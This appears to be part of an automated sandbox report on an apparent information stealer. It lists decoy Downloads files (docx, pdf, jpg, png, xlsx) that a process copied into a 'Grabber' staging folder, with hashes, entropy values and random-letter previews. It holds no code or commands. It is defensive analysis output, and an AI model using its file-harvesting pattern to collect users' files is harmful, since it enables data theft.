Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\DTBZGIOOSO.docx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\DVWHKMNFNN.jpg

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KATAXZVCPS.pdf

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\LTKMYBSEYZ.pdf

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\NWTVCDUMOB.png

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ONBQCLYSPU.pdf

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\UMMBDNEQBN.png

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Downloads\VLZDGUKUTZ.jpg

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

